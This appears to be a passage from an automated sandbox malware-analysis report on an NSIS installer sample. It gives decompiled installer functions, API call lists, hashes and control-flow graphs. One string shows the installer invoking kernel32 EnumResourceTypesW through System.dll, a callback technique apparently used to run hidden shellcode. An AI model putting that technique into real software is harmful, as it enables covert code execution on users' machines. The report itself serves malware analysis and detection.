                                    • Part of subcall function 1000123B: lstrcpyA.KERNEL32(00000000,?,?,?,100014DE,?,10001020,10001019,00000001), ref: 10001258
                                    • Part of subcall function 1000123B: GlobalFree.KERNEL32 ref: 10001269
                                  • GlobalAlloc.KERNELBASE(00000040,000014A4), ref: 10001B76
                                  • lstrcpyA.KERNEL32(00000008,?), ref: 10001BC2
                                  • lstrcpyA.KERNEL32(00000408,?), ref: 10001BCC
                                  • GlobalFree.KERNEL32 ref: 10001BE6
                                  • GlobalFree.KERNEL32 ref: 10001CCE
                                  • GlobalFree.KERNEL32 ref: 10001CD3
                                  • GlobalFree.KERNEL32 ref: 10001CD8
                                  • GlobalFree.KERNEL32 ref: 10001E79
                                  • lstrcpyA.KERNEL32(?,?), ref: 10001FCB
                                  • GetModuleHandleA.KERNEL32(00000008), ref: 1000203D
                                  • LoadLibraryA.KERNEL32(00000008), ref: 1000204E
                                  • lstrlenA.KERNEL32(00000408), ref: 10002082
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.798233791.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                  • Associated: 00000000.00000002.798214888.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798250041.0000000010003000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  • Associated: 00000000.00000002.798280096.0000000010005000.00000002.00000001.01000000.00000005.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_10000000_SC.jbxd
                                  Similarity
                                  • API ID: Global$Free$lstrcpy$Alloc$HandleLibraryLoadModulelstrlen
                                  • String ID:
                                  • API String ID: 226667998-0
                                  • Opcode ID: 8ec8fb265bc8d5da7aa9ee2d86766b0fc4af6a504ffa790e167c9f5f819e0430
                                  • Instruction ID: dbefa70d923fed6e2c1f4067a34d9ed24c8bf5ef1377c6d65b2935cebb3f649c
                                  • Opcode Fuzzy Hash: 8ec8fb265bc8d5da7aa9ee2d86766b0fc4af6a504ffa790e167c9f5f819e0430
                                  • Instruction Fuzzy Hash: E0128971D0464ADEFB20CFA4C8817EEBBF4FB043D0F21852AE595E6189DB749A81CB51
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040173F Relevance: 17.6, APIs: 5, Strings: 5, Instructions: 147stringtimeCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  C-Code - Quality: 60%
                                  			E0040173F(FILETIME* __ebx, void* __eflags) {
				void* _t33;
				void* _t41;
				void* _t43;
				FILETIME* _t49;
				FILETIME* _t62;
				void* _t64;
				signed int _t70;
				FILETIME* _t71;
				FILETIME* _t75;
				signed int _t77;
				void* _t80;
				CHAR* _t82;
				void* _t85;

				_t75 = __ebx;
				_t82 = E00402A07(0x31);
				 *(_t85 - 8) = _t82;
				 *(_t85 + 8) =  *(_t85 - 0x24) & 0x00000007;
				_t33 = E004056B2(_t82);
				_push(_t82);
				if(_t33 == 0) {
					lstrcatA(E00405645(E00405B98(0x409bc0, "C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter\\cavil\\Ablativers91")), ??);
				} else {
					_push(0x409bc0);
					E00405B98();
				}
				E00405E03(0x409bc0);
				while(1) {
					__eflags =  *(_t85 + 8) - 3;
					if( *(_t85 + 8) >= 3) {
						_t64 = E00405E9C(0x409bc0);
						_t77 = 0;
						__eflags = _t64 - _t75;
						if(_t64 != _t75) {
							_t71 = _t64 + 0x14;
							__eflags = _t71;
							_t77 = CompareFileTime(_t71, _t85 - 0x18);
						}
						asm("sbb eax, eax");
						_t70 =  ~(( *(_t85 + 8) + 0xfffffffd | 0x80000000) & _t77) + 1;
						__eflags = _t70;
						 *(_t85 + 8) = _t70;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) == _t75) {
						E00405821(0x409bc0);
					}
					__eflags =  *(_t85 + 8) - 1;
					_t41 = E00405846(0x409bc0, 0x40000000, (0 |  *(_t85 + 8) != 0x00000001) + 1);
					__eflags = _t41 - 0xffffffff;
					 *(_t85 - 0x34) = _t41;
					if(_t41 != 0xffffffff) {
						break;
					}
					__eflags =  *(_t85 + 8) - _t75;
					if( *(_t85 + 8) != _t75) {
						E00404EA5(0xffffffe2,  *(_t85 - 8));
						__eflags =  *(_t85 + 8) - 2;
						if(__eflags == 0) {
							 *((intOrPtr*)(_t85 - 4)) = 1;
						}
						L31:
						 *0x42ec28 =  *0x42ec28 +  *((intOrPtr*)(_t85 - 4));
						__eflags =  *0x42ec28;
						goto L32;
					} else {
						E00405B98(0x40a3c0, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)");
						E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x409bc0);
						E00405BBA(_t75, 0x40a3c0, 0x409bc0, "C:\Users\hardz\AppData\Local\Temp\nsuD883.tmp\System.dll",  *((intOrPtr*)(_t85 - 0x10)));
						E00405B98("kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40a3c0);
						_t62 = E004053C9("C:\Users\hardz\AppData\Local\Temp\nsuD883.tmp\System.dll",  *(_t85 - 0x24) >> 3) - 4;
						__eflags = _t62;
						if(_t62 == 0) {
							continue;
						} else {
							__eflags = _t62 == 1;
							if(_t62 == 1) {
								 *0x42ec28 =  &( *0x42ec28->dwLowDateTime);
								L32:
								_t49 = 0;
								__eflags = 0;
							} else {
								_push(0x409bc0);
								_push(0xfffffffa);
								E00404EA5();
								L29:
								_t49 = 0x7fffffff;
							}
						}
					}
					L33:
					return _t49;
				}
				E00404EA5(0xffffffea,  *(_t85 - 8));
				 *0x42ec54 =  *0x42ec54 + 1;
				_push(_t75);
				_push(_t75);
				_push( *(_t85 - 0x34));
				_push( *((intOrPtr*)(_t85 - 0x1c)));
				_t43 = E00402E6C(); // executed
				 *0x42ec54 =  *0x42ec54 - 1;
				__eflags =  *(_t85 - 0x18) - 0xffffffff;
				_t80 = _t43;
				if( *(_t85 - 0x18) != 0xffffffff) {
					L22:
					SetFileTime( *(_t85 - 0x34), _t85 - 0x18, _t75, _t85 - 0x18); // executed
				} else {
					__eflags =  *((intOrPtr*)(_t85 - 0x14)) - 0xffffffff;
					if( *((intOrPtr*)(_t85 - 0x14)) != 0xffffffff) {
						goto L22;
					}
				}
				FindCloseChangeNotification( *(_t85 - 0x34)); // executed
				__eflags = _t80 - _t75;
				if(_t80 >= _t75) {
					goto L31;
				} else {
					__eflags = _t80 - 0xfffffffe;
					if(_t80 != 0xfffffffe) {
						E00405BBA(_t75, _t80, 0x409bc0, 0x409bc0, 0xffffffee);
					} else {
						E00405BBA(_t75, _t80, 0x409bc0, 0x409bc0, 0xffffffe9);
						lstrcatA(0x409bc0,  *(_t85 - 8));
					}
					_push(0x200010);
					_push(0x409bc0);
					E004053C9();
					goto L29;
				}
				goto L33;
			}
















                                  0x0040173f
                                  0x00401746
                                  0x0040174f
                                  0x00401752
                                  0x00401755
                                  0x0040175a
                                  0x00401762
                                  0x0040177e
                                  0x00401764
                                  0x00401764
                                  0x00401765
                                  0x00401765
                                  0x00401784
                                  0x0040178e
                                  0x0040178e
                                  0x00401792
                                  0x00401795
                                  0x0040179a
                                  0x0040179c
                                  0x0040179e
                                  0x004017a3
                                  0x004017a3
                                  0x004017ae
                                  0x004017ae
                                  0x004017bf
                                  0x004017c1
                                  0x004017c1
                                  0x004017c2
                                  0x004017c2
                                  0x004017c5
                                  0x004017c8
                                  0x004017cb
                                  0x004017cb
                                  0x004017d2
                                  0x004017e1
                                  0x004017e6
                                  0x004017e9
                                  0x004017ec
                                  0x00000000
                                  0x00000000
                                  0x004017ee
                                  0x004017f1
                                  0x0040184b
                                  0x00401850
                                  0x004015a8
                                  0x0040266d
                                  0x0040266d
                                  0x0040289c
                                  0x0040289f
                                  0x0040289f
                                  0x00000000
                                  0x004017f3
                                  0x004017f9
                                  0x00401804
                                  0x00401811
                                  0x0040181c
                                  0x00401832
                                  0x00401832
                                  0x00401835
                                  0x00000000
                                  0x0040183b
                                  0x0040183b
                                  0x0040183c
                                  0x00401859
                                  0x004028a5
                                  0x004028a5
                                  0x004028a5
                                  0x0040183e
                                  0x0040183e
                                  0x0040183f
                                  0x00401492
                                  0x00402224
                                  0x00402224
                                  0x00402224
                                  0x0040183c
                                  0x00401835
                                  0x004028a7
                                  0x004028ab
                                  0x004028ab
                                  0x00401869
                                  0x0040186e
                                  0x00401874
                                  0x00401875
                                  0x00401876
                                  0x00401879
                                  0x0040187c
                                  0x00401881
                                  0x00401887
                                  0x0040188b
                                  0x0040188d
                                  0x00401895
                                  0x004018a1
                                  0x0040188f
                                  0x0040188f
                                  0x00401893
                                  0x00000000
                                  0x00000000
                                  0x00401893
                                  0x004018aa
                                  0x004018b0
                                  0x004018b2
                                  0x00000000
                                  0x004018b8
                                  0x004018b8
                                  0x004018bb
                                  0x004018d3
                                  0x004018bd
                                  0x004018c0
                                  0x004018c9
                                  0x004018c9
                                  0x004018d8
                                  0x004018dd
                                  0x0040221f
                                  0x00000000
                                  0x0040221f
                                  0x00000000

                                  APIs
                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,00000031), ref: 0040177E
                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91,00000000,00000000,00000031), ref: 004017A8
                                    • Part of subcall function 00405B98: lstrcpynA.KERNEL32(?,?,00000400,0040317B,Bilsynssteder Setup,NSIS Error), ref: 00405BA5
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
                                    • Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,74D0EA30), ref: 00404F01
                                    • Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F39
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F53
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F61
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                  • String ID: C:\Users\user\AppData\Local\Temp\Unepitomizeds\Indlaansrenter\cavil\Ablativers91$C:\Users\user\AppData\Local\Temp\nsuD883.tmp$C:\Users\user\AppData\Local\Temp\nsuD883.tmp\System.dll$Call$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                  • API String ID: 1941528284-1440564832
                                  • Opcode ID: 1365fbaad1701f3f5acf491b2e7367b99c08fa3fb0b06c24217b54d84fa2b958
                                  • Instruction ID: 3eee97e154c7fd254b8817dfe04a4aa8189c03b90b2994f5d00cea6654a5a112
                                  • Opcode Fuzzy Hash: 1365fbaad1701f3f5acf491b2e7367b99c08fa3fb0b06c24217b54d84fa2b958
                                  • Instruction Fuzzy Hash: CA41D932900614BADF10BBB5CD46DAF3679EF05369B20423BF511F11E2DA7C6A418BAD
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00402E6C Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 174fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 859 402e6c-402e80 860 402e82 859->860 861 402e89-402e92 859->861 860->861 862 402e94 861->862 863 402e9b-402ea0 861->863 862->863 864 402eb0-402ebd call 40308e 863->864 865 402ea2-402eab call 4030c0 863->865 869 402ec3-402ec7 864->869 870 403039 864->870 865->864 871 403022-403024 869->871 872 402ecd-402f16 GetTickCount 869->872 873 40303b-40303c 870->873 874 403026-403029 871->874 875 403079-40307d 871->875 876 403084 872->876 877 402f1c-402f24 872->877 878 403087-40308b 873->878 881 40302b 874->881 882 40302e-403037 call 40308e 874->882 879 40303e-403044 875->879 880 40307f 875->880 876->878 883 402f26 877->883 884 402f29-402f37 call 40308e 877->884 887 403046 879->887 888 403049-403057 call 40308e 879->888 880->876 881->882 882->870 892 403081 882->892 883->884 884->870 893 402f3d-402f46 884->893 887->888 888->870 896 403059-40306c WriteFile 888->896 892->876 895 402f4c-402f6c call 405fa3 893->895 902 402f72-402f85 GetTickCount 895->902 903 40301a-40301c 895->903 898 40301e-403020 896->898 899 40306e-403071 896->899 898->873 899->898 901 403073-403076 899->901 901->875 904 402f87-402f8f 902->904 905 402fca-402fce 902->905 903->873 906 402f91-402f95 904->906 907 402f97-402fc7 MulDiv wsprintfA call 404ea5 904->907 908 402fd0-402fd3 905->908 909 40300f-403012 905->909 906->905 906->907 907->905 911 402ff5-403000 908->911 912 402fd5-402fe9 WriteFile 908->912 909->877 913 403018 909->913 916 403003-403007 911->916 912->898 915 402feb-402fee 912->915 913->876 915->898 917 402ff0-402ff3 915->917 916->895 918 40300d 916->918 917->916 918->876
                                  C-Code - Quality: 95%
                                  			E00402E6C(int _a4, void* _a8, long _a12, int _a16, signed char _a19) {
				signed int _v8;
				long _v12;
				void* _v16;
				long _v20;
				long _v24;
				intOrPtr _v28;
				char _v92;
				void* _t67;
				void* _t68;
				long _t74;
				intOrPtr _t79;
				long _t80;
				void* _t82;
				int _t84;
				intOrPtr _t95;
				void* _t97;
				void* _t100;
				long _t101;
				signed int _t102;
				long _t103;
				int _t104;
				intOrPtr _t105;
				long _t106;
				void* _t107;

				_t102 = _a16;
				_t97 = _a12;
				_v12 = _t102;
				if(_t97 == 0) {
					_v12 = 0x8000;
				}
				_v8 = _v8 & 0x00000000;
				_v16 = _t97;
				if(_t97 == 0) {
					_v16 = 0x418bd0;
				}
				_t65 = _a4;
				if(_a4 >= 0) {
					_t95 =  *0x42ebf8; // 0x9994
					E004030C0(_t95 + _t65);
				}
				_t67 = E0040308E( &_a16, 4); // executed
				if(_t67 == 0) {
					L34:
					_push(0xfffffffd);
					goto L35;
				} else {
					if((_a19 & 0x00000080) == 0) {
						if(_t97 == 0) {
							while(_a16 > 0) {
								_t103 = _v12;
								if(_a16 < _t103) {
									_t103 = _a16;
								}
								if(E0040308E(0x414bd0, _t103) == 0) {
									goto L34;
								} else {
									if(WriteFile(_a8, 0x414bd0, _t103,  &_a12, 0) == 0 || _t103 != _a12) {
										L29:
										_push(0xfffffffe);
										L35:
										_pop(_t68);
										return _t68;
									} else {
										_v8 = _v8 + _t103;
										_a16 = _a16 - _t103;
										continue;
									}
								}
							}
							L45:
							return _v8;
						}
						if(_a16 < _t102) {
							_t102 = _a16;
						}
						if(E0040308E(_t97, _t102) != 0) {
							_v8 = _t102;
							goto L45;
						} else {
							goto L34;
						}
					}
					_t74 = GetTickCount();
					 *0x40b534 =  *0x40b534 & 0x00000000;
					 *0x40b530 =  *0x40b530 & 0x00000000;
					_t14 =  &_a16;
					 *_t14 = _a16 & 0x7fffffff;
					_v20 = _t74;
					 *0x40b018 = 8;
					 *0x414bc0 = 0x40cbb8;
					 *0x414bbc = 0x40cbb8;
					 *0x414bb8 = 0x414bb8;
					_a4 = _a16;
					if( *_t14 <= 0) {
						goto L45;
					} else {
						goto L9;
					}
					while(1) {
						L9:
						_t104 = 0x4000;
						if(_a16 < 0x4000) {
							_t104 = _a16;
						}
						if(E0040308E(0x414bd0, _t104) == 0) {
							goto L34;
						}
						_a16 = _a16 - _t104;
						 *0x40b008 = 0x414bd0;
						 *0x40b00c = _t104;
						while(1) {
							_t100 = _v16;
							 *0x40b010 = _t100;
							 *0x40b014 = _v12;
							_t79 = E00405FA3(0x40b008);
							_v28 = _t79;
							if(_t79 < 0) {
								break;
							}
							_t105 =  *0x40b010; // 0x41b7d0
							_t106 = _t105 - _t100;
							_t80 = GetTickCount();
							_t101 = _t80;
							if(( *0x42ec54 & 0x00000001) != 0 && (_t80 - _v20 > 0xc8 || _a16 == 0)) {
								wsprintfA( &_v92, "... %d%%", MulDiv(_a4 - _a16, 0x64, _a4));
								_t107 = _t107 + 0xc;
								E00404EA5(0,  &_v92);
								_v20 = _t101;
							}
							if(_t106 == 0) {
								if(_a16 > 0) {
									goto L9;
								}
								goto L45;
							} else {
								if(_a12 != 0) {
									_t82 =  *0x40b010; // 0x41b7d0
									_v8 = _v8 + _t106;
									_v12 = _v12 - _t106;
									_v16 = _t82;
									L24:
									if(_v28 != 1) {
										continue;
									}
									goto L45;
								}
								_t84 = WriteFile(_a8, _v16, _t106,  &_v24, 0); // executed
								if(_t84 == 0 || _v24 != _t106) {
									goto L29;
								} else {
									_v8 = _v8 + _t106;
									goto L24;
								}
							}
						}
						_push(0xfffffffc);
						goto L35;
					}
					goto L34;
				}
			}



























                                  0x00402e74
                                  0x00402e78
                                  0x00402e7b
                                  0x00402e80
                                  0x00402e82
                                  0x00402e82
                                  0x00402e89
                                  0x00402e8d
                                  0x00402e92
                                  0x00402e94
                                  0x00402e94
                                  0x00402e9b
                                  0x00402ea0
                                  0x00402ea2
                                  0x00402eab
                                  0x00402eab
                                  0x00402eb6
                                  0x00402ebd
                                  0x00403039
                                  0x00403039
                                  0x00000000
                                  0x00402ec3
                                  0x00402ec7
                                  0x00403024
                                  0x00403079
                                  0x0040303e
                                  0x00403044
                                  0x00403046
                                  0x00403046
                                  0x00403057
                                  0x00000000
                                  0x00403059
                                  0x0040306c
                                  0x0040301e
                                  0x0040301e
                                  0x0040303b
                                  0x0040303b
                                  0x00000000
                                  0x00403073
                                  0x00403073
                                  0x00403076
                                  0x00000000
                                  0x00403076
                                  0x0040306c
                                  0x00403057
                                  0x00403084
                                  0x00000000
                                  0x00403084
                                  0x00403029
                                  0x0040302b
                                  0x0040302b
                                  0x00403037
                                  0x00403081
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00403037
                                  0x00402ed3
                                  0x00402ed5
                                  0x00402edc
                                  0x00402ee3
                                  0x00402ee3
                                  0x00402eea
                                  0x00402ef2
                                  0x00402efc
                                  0x00402f01
                                  0x00402f09
                                  0x00402f13
                                  0x00402f16
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402f1c
                                  0x00402f1c
                                  0x00402f1c
                                  0x00402f24
                                  0x00402f26
                                  0x00402f26
                                  0x00402f37
                                  0x00000000
                                  0x00000000
                                  0x00402f3d
                                  0x00402f40
                                  0x00402f46
                                  0x00402f4c
                                  0x00402f4c
                                  0x00402f57
                                  0x00402f5d
                                  0x00402f62
                                  0x00402f69
                                  0x00402f6c
                                  0x00000000
                                  0x00000000
                                  0x00402f72
                                  0x00402f78
                                  0x00402f7a
                                  0x00402f83
                                  0x00402f85
                                  0x00402fb3
                                  0x00402fb9
                                  0x00402fc2
                                  0x00402fc7
                                  0x00402fc7
                                  0x00402fce
                                  0x00403012
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x00402fd0
                                  0x00402fd3
                                  0x00402ff5
                                  0x00402ffa
                                  0x00402ffd
                                  0x00403000
                                  0x00403003
                                  0x00403007
                                  0x00000000
                                  0x00000000
                                  0x00000000
                                  0x0040300d
                                  0x00402fe1
                                  0x00402fe9
                                  0x00000000
                                  0x00402ff0
                                  0x00402ff0
                                  0x00000000
                                  0x00402ff0
                                  0x00402fe9
                                  0x00402fce
                                  0x0040301a
                                  0x00000000
                                  0x0040301a
                                  0x00000000
                                  0x00402f1c

                                  APIs
                                  • GetTickCount.KERNEL32 ref: 00402ED3
                                  • GetTickCount.KERNEL32 ref: 00402F7A
                                  • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402FA3
                                  • wsprintfA.USER32 ref: 00402FB3
                                  • WriteFile.KERNELBASE(00000000,00000000,0041B7D0,7FFFFFFF,00000000), ref: 00402FE1
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: CountTick$FileWritewsprintf
                                  • String ID: ... %d%%
                                  • API String ID: 4209647438-2449383134
                                  • Opcode ID: aba47b48a9928ac6846ac2c3c3fa3cecc3ff6eb2f49fa31c431ac569253bfb25
                                  • Instruction ID: e6e53096b9df34268c081c1931919b8a79bb66bca8ede7c05b8811e72ff60024
                                  • Opcode Fuzzy Hash: aba47b48a9928ac6846ac2c3c3fa3cecc3ff6eb2f49fa31c431ac569253bfb25
                                  • Instruction Fuzzy Hash: 17617C7180221AEBCB10CF66DA447AF7BB8EB40755F10453BF810B72D4D7B89A40DBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00401F68 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 73libraryloaderCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 919 401f68-401f74 920 401f7a-401f90 call 402a07 * 2 919->920 921 40202f-402031 919->921 931 401f92-401f9d GetModuleHandleA 920->931 932 401f9f-401fad LoadLibraryExA 920->932 923 40217a-40217f call 401423 921->923 929 40289c-4028ab 923->929 930 40266d-402674 923->930 930->929 931->932 934 401faf-401fbc GetProcAddress 931->934 932->934 935 402028-40202a 932->935 937 401ffb-402000 call 404ea5 934->937 938 401fbe-401fc4 934->938 935->923 942 402005-402008 937->942 940 401fc6-401fd2 call 401423 938->940 941 401fdd-401ff4 call 100016da 938->941 940->942 951 401fd4-401fdb 940->951 944 401ff6-401ff9 941->944 942->929 945 40200e-402016 call 4035e3 942->945 944->942 945->929 950 40201c-402023 FreeLibrary 945->950 950->929 951->942
                                  C-Code - Quality: 60%
                                  			E00401F68(void* __ebx, void* __eflags) {
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t26;
				void* _t27;
				struct HINSTANCE__* _t30;
				CHAR* _t32;
				intOrPtr* _t33;
				void* _t34;

				_t27 = __ebx;
				asm("sbb eax, 0x42ec58");
				 *(_t34 - 4) = 1;
				if(__eflags < 0) {
					_push(0xffffffe7);
					L15:
					E00401423();
					L16:
					 *0x42ec28 =  *0x42ec28 +  *(_t34 - 4);
					return 0;
				}
				_t32 = E00402A07(0xfffffff0);
				 *(_t34 + 8) = E00402A07(1);
				if( *((intOrPtr*)(_t34 - 0x14)) == __ebx) {
					L3:
					_t18 = LoadLibraryExA(_t32, _t27, 8); // executed
					_t30 = _t18;
					if(_t30 == _t27) {
						_push(0xfffffff6);
						goto L15;
					}
					L4:
					_t33 = GetProcAddress(_t30,  *(_t34 + 8));
					if(_t33 == _t27) {
						E00404EA5(0xfffffff7,  *(_t34 + 8));
					} else {
						 *(_t34 - 4) = _t27;
						if( *((intOrPtr*)(_t34 - 0x1c)) == _t27) {
							 *_t33( *((intOrPtr*)(_t34 - 0x34)), 0x400, "kernel32::EnumResourceTypesW(i 0,i r1,i 0)", 0x40afc4, " \xef\xbf\xbdB"); // 						} else {
							E00401423( *((intOrPtr*)(_t34 - 0x1c)));
							if( *_t33() != 0) {
								 *(_t34 - 4) = 1;
							}
						}
					}
					if( *((intOrPtr*)(_t34 - 0x18)) == _t27 && E004035E3(_t30) != 0) {
						FreeLibrary(_t30);
					}
					goto L16;
				}
				_t26 = GetModuleHandleA(_t32); // executed
				_t30 = _t26;
				if(_t30 != __ebx) {
					goto L4;
				}
				goto L3;
			}










                                  0x00401f68
                                  0x00401f68
                                  0x00401f6d
                                  0x00401f74
                                  0x0040202f
                                  0x0040217a
                                  0x0040217a
                                  0x0040289c
                                  0x0040289f
                                  0x004028ab
                                  0x004028ab
                                  0x00401f83
                                  0x00401f8d
                                  0x00401f90
                                  0x00401f9f
                                  0x00401fa3
                                  0x00401fa9
                                  0x00401fad
                                  0x00402028
                                  0x00000000
                                  0x00402028
                                  0x00401faf
                                  0x00401fb8
                                  0x00401fbc
                                  0x00402000
                                  0x00401fbe
                                  0x00401fc1
                                  0x00401fc4
                                  0x00401ff4
                                  0x00401fc6
                                  0x00401fc9
                                  0x00401fd2
                                  0x00401fd4
                                  0x00401fd4
                                  0x00401fd2
                                  0x00401fc4
                                  0x00402008
                                  0x0040201d
                                  0x0040201d
                                  0x00000000
                                  0x00402008
                                  0x00401f93
                                  0x00401f99
                                  0x00401f9d
                                  0x00000000
                                  0x00000000
                                  0x00000000

                                  APIs
                                  • GetModuleHandleA.KERNELBASE(00000000,00000001,000000F0), ref: 00401F93
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000,?), ref: 00404EDE
                                    • Part of subcall function 00404EA5: lstrlenA.KERNEL32(00402FC7,00429800,00000000,0041B7D0,74D0EA30,?,?,?,?,?,?,?,?,?,00402FC7,00000000), ref: 00404EEE
                                    • Part of subcall function 00404EA5: lstrcatA.KERNEL32(00429800,00402FC7,00402FC7,00429800,00000000,0041B7D0,74D0EA30), ref: 00404F01
                                    • Part of subcall function 00404EA5: SetWindowTextA.USER32(00429800,00429800), ref: 00404F13
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F39
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F53
                                    • Part of subcall function 00404EA5: SendMessageA.USER32 ref: 00404F61
                                  • LoadLibraryExA.KERNELBASE(00000000,?,00000008,00000001,000000F0), ref: 00401FA3
                                  • GetProcAddress.KERNEL32(00000000,?), ref: 00401FB3
                                  • FreeLibrary.KERNEL32(00000000,00000000,000000F7,?,?,00000008,00000001,000000F0), ref: 0040201D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.781737895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.781719139.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781774465.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.781799643.0000000000443000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.782001442.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_SC.jbxd
                                  Similarity
                                  • API ID: MessageSend$Librarylstrlen$AddressFreeHandleLoadModuleProcTextWindowlstrcat
                                  • String ID: B$kernel32::EnumResourceTypesW(i 0,i r1,i 0)
                                  • API String ID: 2987980305-852152979
                                  • Opcode ID: a2a6e10e03f190fb71f87f1f2a28dbfcf7ca9d1997bfabcbdd32e5a8b3878e1a
                                  • Instruction ID: 79fa90d82ccd561df316461cbb3a1ba09b48d8e8b52b881675a17e3388d19d59
                                  • Opcode Fuzzy Hash: a2a6e10e03f190fb71f87f1f2a28dbfcf7ca9d1997bfabcbdd32e5a8b3878e1a
                                  • Instruction Fuzzy Hash: F0215B32904211A6CF207FA5CE89A6E3970AF44358F20413BF601B62D1DBBD49419A5E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040231A Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71registrystringCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
